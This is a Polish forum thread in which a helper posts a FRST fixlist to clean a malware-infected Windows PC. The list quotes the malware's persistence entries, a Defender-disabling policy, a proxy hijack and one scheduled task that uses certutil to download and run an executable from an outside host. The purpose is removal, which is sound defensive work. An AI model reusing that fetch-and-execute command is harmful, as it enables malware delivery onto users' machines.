Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Wolny system i i dużo dziwnych procesów w menadżerze urządzeń

wanio18 10 Cze 2018 15:07 273 2
  • #2 10 Cze 2018 15:45
    krzychupar
    Poziom 41  

    Otwórz notatnik systemowy i wklej:

    Task: {1E9D55C5-5AEF-4FFF-9338-E6E72366AF3A} - System32\Tasks\TdqeVjasHzsikvrWtEm2 => rundll32 "C:\Program Files (x86)\wCCFxMJCsZmzC\KgCONmC.dll",#1
    Task: {28EC3352-6C2F-4B70-9C61-85324DCBBFC2} - System32\Tasks\WPDRSE\Config_Error\Version => C:\Users\PEPE\AppData\Roaming\SimanticSt.exe [2018-06-09] () <==== UWAGA
    Task: {407713C3-78CD-4B4D-AF37-F71056B0750B} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\PEPE\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\PEPE\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    Task: {49272B40-03A4-49BE-8F08-2DB35EB5B2EC} - System32\Tasks\OneDrive\OneDriveUpdate => C:\ProgramData\onedrive.exe [2018-06-09] (MDLS) <==== UWAGA
    Task: {578A2551-4A0F-45AA-AD6E-7C608194ECE9} - System32\Tasks\{F7BA8008-FFCD-1F55-9330-0668DB86EEE9} => C:\Users\PEPE\AppData\Roaming\lEIauYasn.exe <==== UWAGA
    Task: {78101DE5-A7D3-43E8-B431-D520064090ED} - System32\Tasks\{3AFC12E1-96AB-4277-81F9-374524ACC300} => C:\Windows\system32\pcalua.exe -a "C:\Users\PEPE\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
    Task: {9188501A-26AA-45FA-BDB1-151674C1211F} - System32\Tasks\Driver Booster SkipUAC (PEPE) => C:\Program Files (x86)\IObit\Driver Booster\4.5.0\DriverBooster.exe
    Task: {9B5E6EC0-6289-4875-BC82-2D98455021B3} - System32\Tasks\Opera scheduled Autoupdate 4086469641 => C:\Windows\system32\cmd.exe /c start "" "C:\Users\PEPE\AppData\Roaming\Microsoft\Windows\jggvwgee\agedijca.exe"
    Task: {B4605705-F6E7-4A4E-9B1B-125D16C0BC1A} - System32\Tasks\XLqsfoKFUKuTqG => rundll32 "C:\Program Files (x86)\ijcQGTqqPStU2\rUVvTuVShUosg.dll",#1
    Task: {C291305A-5732-41BA-89F4-1D914CF4D9FD} - System32\Tasks\{9494AC32-14FA-4F94-A027-D4E34F731EC7} => C:\Windows\system32\pcalua.exe -a "C:\MOJE\Liga Polska Manager 2005 Nowa Edycja\Liga Polska Manager 2005 Nowa Edycja\LPM_dodatki\LPM_dodatki.exe" -d "C:\MOJE\Liga Polska Manager 2005 Nowa Edycja\Liga Polska Manager 2005 Nowa Edycja\LPM_dodatki"
    Task: {DBDAA8F6-AC26-4DBD-A60D-FE83A8F41393} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-09] () <==== UWAGA
    Task: {E4030C65-C2FF-493D-9922-1F770F818BBB} - System32\Tasks\KnPQHVchzdGfrlHaz2 => rundll32 "C:\Program Files (x86)\OxoywZINBbQwrioRGrR\fKVsjEZ.dll",#1
    Task: {F753B4C9-DC4B-47E6-994F-EBA2D46A3FD4} - System32\Tasks\rArHIXNWKfbeRtR2 => rundll32 "C:\Program Files (x86)\EgDGbQEiU\UvuSUs.dll",#1
    Task: {F8C054DD-152F-4516-A842-2375F86A4D56} - System32\Tasks\WobUIKhuMtTTi2 => C:\Windows\system32\wscript.exe "C:\ProgramData\XjOPTLXDzAynQaVB\bOqMUCC.wsf"
    ShortcutWithArgument: C:\Users\PEPE\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%




    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
    ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
    Hosts:
    HKLM\...\RunOnce: [OMEWPRODUCT_7AW6K] => C:\Users\PEPE\AppData\Local\Temp\is-7DSTI.tmp\up.exe [52224 2018-06-09] (WFKR5) <==== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_E1TK5] => C:\Users\PEPE\AppData\Local\Temp\is-44A1N.tmp\up.exe [52224 2018-06-09] (WFKR5) <==== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_TAWB0] => C:\Users\PEPE\AppData\Local\Temp\is-M70NQ.tmp\up.exe [52224 2018-06-10] (@SL) <==== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_VUSNO] => C:\Users\PEPE\AppData\Local\Temp\is-8SUJI.tmp\up.exe [52224 2018-06-10] (@SL) <==== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_LDK2H] => C:\Users\PEPE\AppData\Local\Temp\is-71QSN.tmp\up.exe [52224 2018-06-10] (@SL) <==== UWAGA
    Winlogon\Notify\ScCertProp: wlnotify.dll [X]
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [IcyShadow] => C:\Windows\rss\csrss.exe [3115520 2018-06-09] () <==== UWAGA
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [6781667] => C:\Users\PEPE\AppData\Roaming\xhnbjchwoww\2vdq2dwz41n.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [375389] => C:\Users\PEPE\AppData\Roaming\yktwrckuixu\kux5akzhuhb.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [7900825] => C:\Users\PEPE\AppData\Roaming\ygm5vfkllhr\kofoq3gm2pl.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [5314677] => C:\Users\PEPE\AppData\Roaming\bt2qmu3rsnr\4u0e1ehgfxy.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [HXO0JCFEU0PU1GF] => "C:\Program Files\U1404I60IX\U1404I60I.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [T47IRS1602ODLE4] => "C:\Program Files\WZ78110KMU\WZ78110KM.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [TNA3MGUPL4JY2QJ] => "C:\Program Files\5GFT8WOV6X\5GFT8WOV6.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [8803374] => C:\Users\PEPE\AppData\Roaming\lravkggywmr\lmrpkcyume4.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [SAJV7F8AE94PJOP] => "C:\Program Files\JN9WV7XGN5\JN9WV7XGN.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [B3CGXP0NT57S6NW] => "C:\Program Files\JDRCO96B2U\ER8JGDWUW.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [297539] => C:\Users\PEPE\AppData\Roaming\fzqjgnnv4ts\qrfd43zulby.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [1833478] => C:\Users\PEPE\AppData\Roaming\5ol3hfw0i53\j4gzx1uocev.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [2703192] => C:\Users\PEPE\AppData\Roaming\hwwwf0otu4c\motcmuf0nim.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [7078001] => C:\Users\PEPE\AppData\Roaming\ghbkjwdiprh\b3000yzoog3.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [9975943] => C:\Users\PEPE\AppData\Roaming\u1mkedytak4\sime4pzuhgf.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [3261151] => "C:\Users\PEPE\AppData\Roaming\jlkiddfhrn4\1vfy4zae3pd.exe" /VERYSILENT
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [1006476] => C:\Users\PEPE\AppData\Roaming\4wv25smxx1a\p4ftj0ho2zb.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [6382261] => C:\Users\PEPE\AppData\Roaming\bgkjaa0hgwj\ox44evm1kc2.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [4689371] => C:\Users\PEPE\AppData\Roaming\wu3dhgx44ge\svo33wl52dl.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [CNUEOUEB80WWYVE] => "C:\Program Files\EXH5GK5KYR\EXH5GK5KY.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [JJOIVEL9HLPLMAY] => "C:\Program Files\FIV342M69S\FIV342M69.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [L1TBNL7C6KLI885] => "C:\Program Files\HIOTWTRHRL\HIOTWTRHR.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [4DRYQC2GLY2S1ZG] => "C:\Program Files\4TEV7LPLS9\4TEV7LPLS.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [SAEN971PNZTGGOJ] => "C:\Program Files\3TY6J60GGJ\3TY6J60GG.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [CloudNet] => C:\Users\PEPE\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-10] (EpicNet Inc.) <==== UWAGA
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [W3OISUQKYV9O43H] => "C:\Program Files\4C0OGD6CHL\4C0OGD6CH.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [J5W2V5I6Z7R3JD8] => "C:\Program Files\EJQOGB2HFD\EJQOGB2HF.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [9557954] => C:\Users\PEPE\AppData\Roaming\kpbvi1xqltx\ht34v4nvjis.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [9502162] => C:\Users\PEPE\AppData\Roaming\5d41pa3oj0n\gh5f33xakve.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [2357471] => C:\Users\PEPE\AppData\Roaming\dzyzhwlodii\myuqguqwteh.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [3739347] => C:\Users\PEPE\AppData\Roaming\ofxblenyswn\accunqs2kqh.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [HJNXRG3VBFTNSR2] => "C:\Program Files\UBHO2MCGO3\70O3AMIHN.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [3253657] => C:\Users\PEPE\AppData\Roaming\jzjpu0nqs3a\f2wyuukmesc.exe [537687 2018-06-10] ( )
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\Run: [6U0A0XILN5D4QNO] => "C:\Program Files\G4WHR60SS1\G4WHR60SS.exe"
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\...\MountPoints2: {d4b8b716-6c0a-11e8-84f6-88ae1db550e1} - F:\autorun.exe
    ShellExecuteHooks: Brak nazwy - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] () <==== UWAGA
    GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
    ProxyEnable: [S-1-5-21-2591441210-2276695346-2989985460-1000] => Proxy [funkcja włączona]
    ProxyServer: [S-1-5-21-2591441210-2276695346-2989985460-1000] => http=127.0.0.1:8080;https=127.0.0.1:8080
    ManualProxies: 1http=127.0.0.1:8080;https=127.0.0.1:8080
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...NXSMS_JT9sxQU9pFGp8Q4E5sI1u97YVM102g,,&q={searchTerms}
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61...GSilrANZDs28yoW6Oj1Rh74R7xpgNAr3jvM2nDJ3ziw,,,,
    HKU\S-1-5-21-2591441210-2276695346-2989985460-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...NXSMS_JT9sxQU9pFGp8Q4E5sI1u97YVM102g,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-2591441210-2276695346-2989985460-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...NXSMS_JT9sxQU9pFGp8Q4E5sI1u97YVM102g,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-2591441210-2276695346-2989985460-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...NXSMS_JT9sxQU9pFGp8Q4E5sI1u97YVM102g,,&q={searchTerms}
    BHO: YoutubeAdBlock -> {C0D38E5A-7CF8-4105-8FE8-31B81443A114} -> C:\Program Files (x86)\lJFUJMGEHIE\tMqRWLa.dll => Brak pliku
    BHO-x32: YoutubeAdBlock -> {C0D38E5A-7CF8-4105-8FE8-31B81443A114} -> C:\Program Files (x86)\lJFUJMGEHIE\kGzWr4oY.dll => Brak pliku
    "gpkpevzc" => serwis został odblokowany. <==== UWAGA
    S2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-06-09] () [Brak podpisu cyfrowego] <==== UWAGA
    S2 gpkpevzc; C:\Windows\SysWOW64\gpkpevzc\ggflwkru.exe [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    S4 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [43520 2018-06-09] () [Brak podpisu cyfrowego] <==== UWAGA
    S2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Brak podpisu cyfrowego] <==== UWAGA
    S4 WNetworkMgmt; C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe [6232185 2018-05-22] () [Brak podpisu cyfrowego] <==== UWAGA <==== UWAGA
    S1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-06-09] () [Brak podpisu cyfrowego] <==== UWAGA
    S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X]
    2018-06-10 13:29 - 2018-06-10 13:29 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\ofxblenyswn
    2018-06-10 13:29 - 2018-06-10 13:29 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\jzjpu0nqs3a
    2018-06-10 13:27 - 2018-06-10 13:27 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\wu3dhgx44ge
    2018-06-10 13:27 - 2018-06-10 13:27 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\kpbvi1xqltx
    2018-06-10 13:27 - 2018-06-10 13:27 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\dzyzhwlodii
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\u1mkedytak4
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\hwwwf0otu4c
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\ghbkjwdiprh
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\fzqjgnnv4ts
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\bgkjaa0hgwj
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\5ol3hfw0i53
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\5d41pa3oj0n
    2018-06-10 13:26 - 2018-06-10 13:26 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\4wv25smxx1a
    2018-06-10 13:25 - 2018-06-10 13:25 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\yktwrckuixu
    2018-06-10 13:25 - 2018-06-10 13:25 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\ygm5vfkllhr
    2018-06-10 13:25 - 2018-06-10 13:25 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\xhnbjchwoww
    2018-06-10 13:25 - 2018-06-10 13:25 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\lravkggywmr
    2018-06-10 13:25 - 2018-06-10 13:25 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\bt2qmu3rsnr
    2018-06-10 13:17 - 2018-06-10 10:38 - 001402880 _____ C:\Users\PEPE\Desktop\HiJackThis.msi
    2018-06-10 11:17 - 2018-06-10 11:54 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\3pkuyes3fon
    2018-06-10 11:17 - 2018-06-10 11:17 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\r2rdoz2rzvz
    2018-06-10 11:17 - 2018-06-10 11:17 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\2hkwr4tnoph
    2018-06-10 11:14 - 2018-06-10 11:14 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\pziqfnespxp
    2018-06-10 10:55 - 2018-06-10 10:55 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\e0iougyefwz
    2018-06-10 10:55 - 2018-06-10 10:55 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\1sfzyczm2zi
    2018-06-10 10:54 - 2018-06-10 10:54 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\q4lxahy5kti
    2018-06-10 10:54 - 2018-06-10 10:54 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\0dyjkrcrwn5
    2018-06-10 10:39 - 2018-06-10 10:39 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\okxmtadakx1
    2018-06-10 10:39 - 2018-06-10 10:39 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\4akhfzy1tzy
    2018-06-10 10:38 - 2018-06-10 10:38 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\mvskvcbsfqr
    2018-06-10 10:38 - 2018-06-10 10:38 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\3y1buftkesi
    2018-06-10 10:38 - 2018-06-10 10:38 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\3tnhp1yvmeg
    2018-06-10 10:28 - 2018-06-10 10:28 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\3zfdoliaiur
    2018-06-10 00:04 - 2018-06-10 00:04 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\ymbuxr21q2f
    2018-06-10 00:04 - 2018-06-10 00:04 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\wyit3u50moe
    2018-06-10 00:04 - 2018-06-10 00:04 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\u2xll2bihn5
    2018-06-10 00:03 - 2018-06-10 00:03 - 000003160 _____ C:\Windows\System32\Tasks\{3AFC12E1-96AB-4277-81F9-374524ACC300}
    2018-06-10 00:03 - 2018-06-10 00:03 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\gd4ps2y0vok
    2018-06-09 23:59 - 2018-06-09 23:59 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\ogskuejbk3p
    2018-06-09 23:59 - 2018-06-09 23:59 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\fup2a5rlydn
    2018-06-09 23:39 - 2018-06-09 23:39 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\b1tepslxpo1
    2018-06-09 23:36 - 2018-06-09 23:36 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\n2ag50agawg
    2018-06-09 23:36 - 2018-06-09 23:36 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\3iux4viih3y
    2018-06-09 23:34 - 2018-06-09 23:34 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\dxq0jlg1y5d
    2018-06-09 23:34 - 2018-06-09 23:34 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\3qrbioxyvqv
    2018-06-09 23:33 - 2018-06-09 23:33 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\2d2oyzn2rdy
    2018-06-09 23:31 - 2018-06-09 23:31 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\u0axfur23lk
    2018-06-09 23:31 - 2018-06-09 23:31 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\dczrc50qxm2
    2018-06-09 23:24 - 2018-06-09 23:24 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\fniqroczze5
    2018-06-09 23:24 - 2018-06-09 23:24 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\enizmo5ivtu
    2018-06-09 23:24 - 2018-06-09 23:24 - 000000000 ____D C:\ProgramData\XjOPTLXDzAynQaVB
    2018-06-09 23:20 - 2018-06-09 23:20 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\uwbaniz23e1
    2018-06-09 23:20 - 2018-06-09 23:20 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\ecalsm2sq2u
    2018-06-09 23:20 - 2018-06-09 23:20 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\cde1flexiqm
    2018-06-09 23:18 - 2018-06-09 23:18 - 006420480 _____ C:\Users\PEPE\AppData\Roaming\SimanticSt.exe
    2018-06-09 23:12 - 2018-06-09 23:12 - 007627776 _____ C:\Users\PEPE\AppData\Local\agent.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 000278508 _____ C:\Users\PEPE\AppData\Local\Geoplus.bin
    2018-06-09 23:12 - 2018-06-09 23:12 - 000140800 _____ C:\Users\PEPE\AppData\Local\installer.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 000126464 _____ C:\Users\PEPE\AppData\Local\noah.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 000070896 _____ C:\Users\PEPE\AppData\Local\Config.xml
    2018-06-09 23:12 - 2018-06-09 23:12 - 000018432 _____ C:\Users\PEPE\AppData\Local\Main.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 000005568 _____ C:\Users\PEPE\AppData\Local\md.xml
    2018-06-09 23:12 - 2018-06-09 23:12 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\mg4lmk2dv0v
    2018-06-09 23:12 - 2018-06-09 23:12 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\FastDataX
    2018-06-09 23:12 - 2018-06-09 23:12 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\f1cga4zlz4k
    2018-06-09 23:12 - 2018-06-09 23:12 - 000000000 ____D C:\Users\PEPE\AppData\Roaming\0tjyzs5squi
    2018-06-09 23:32 - 2018-06-09 23:28 - 000389120 ___SH (MDLS) C:\ProgramData\onedrive.exe
    1601-01-03 21:33 - 1601-01-03 21:33 - 000073216 _____ (Microsoft Corporation) C:\Program Files (x86)\Common Files\Eaowau.exe
    2018-06-09 23:18 - 2018-06-09 23:18 - 006420480 _____ () C:\Users\PEPE\AppData\Roaming\SimanticSt.exe
    2018-06-09 23:12 - 2018-06-09 23:12 - 007627776 _____ () C:\Users\PEPE\AppData\Local\agent.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 000070896 _____ () C:\Users\PEPE\AppData\Local\Config.xml
    2018-06-09 23:12 - 2018-06-09 23:12 - 000278508 _____ () C:\Users\PEPE\AppData\Local\Geoplus.bin
    2018-06-09 23:12 - 2018-06-09 23:26 - 000017568 _____ () C:\Users\PEPE\AppData\Local\InstallationConfiguration.xml
    2018-06-09 23:12 - 2018-06-09 23:12 - 000140800 _____ () C:\Users\PEPE\AppData\Local\installer.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 001810944 _____ (TODO: <Company name>) C:\Users\PEPE\AppData\Local\KonkRandom.exe
    2018-06-09 23:12 - 2018-06-09 23:12 - 001987584 _____ () C:\Users\PEPE\AppData\Local\KonkRandom.tst
    2018-06-09 23:12 - 2018-06-09 23:12 - 000018432 _____ () C:\Users\PEPE\AppData\Local\Main.dat
    2018-06-09 23:12 - 2018-06-09 23:12 - 000005568 _____ () C:\Users\PEPE\AppData\Local\md.xml
    2018-06-09 23:12 - 2018-06-09 23:12 - 000126464 _____ () C:\Users\PEPE\AppData\Local\noah.dat
    2018-06-09 23:13 - 2018-06-09 23:13 - 001895382 _____ () C:\Users\PEPE\AppData\Local\Redquadphase.bin
    2018-06-09 23:12 - 2018-06-09 23:26 - 000929792 _____ () C:\Users\PEPE\AppData\Local\sham.db
    2018-06-09 23:13 - 2018-06-09 23:13 - 000032038 _____ () C:\Users\PEPE\AppData\Local\uninstall_temp.ico
    2018-06-09 23:11 - 2018-06-09 23:11 - 000000003 _____ () C:\Users\PEPE\AppData\Local\wbem.ini
    C:\Users\PEPE\AppData\Local\Temp\is-7DSTI.tmp\up.exe
    C:\Users\PEPE\AppData\Local\Temp\is-44A1N.tmp\up.exe
    C:\Users\PEPE\AppData\Local\Temp\is-M70NQ.tmp\up.exe
    C:\Users\PEPE\AppData\Local\Temp\is-8SUJI.tmp\up.exe
    C:\Users\PEPE\AppData\Local\Temp\is-71QSN.tmp\up.exe
    C:\Windows\rss\csrss.exe
    C:\Users\PEPE\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #3 10 Cze 2018 16:33
    wanio18
    Poziom 7  

    Problem jest taki że teraz nawet nie chce mi się uruchomić FRST.exe

    0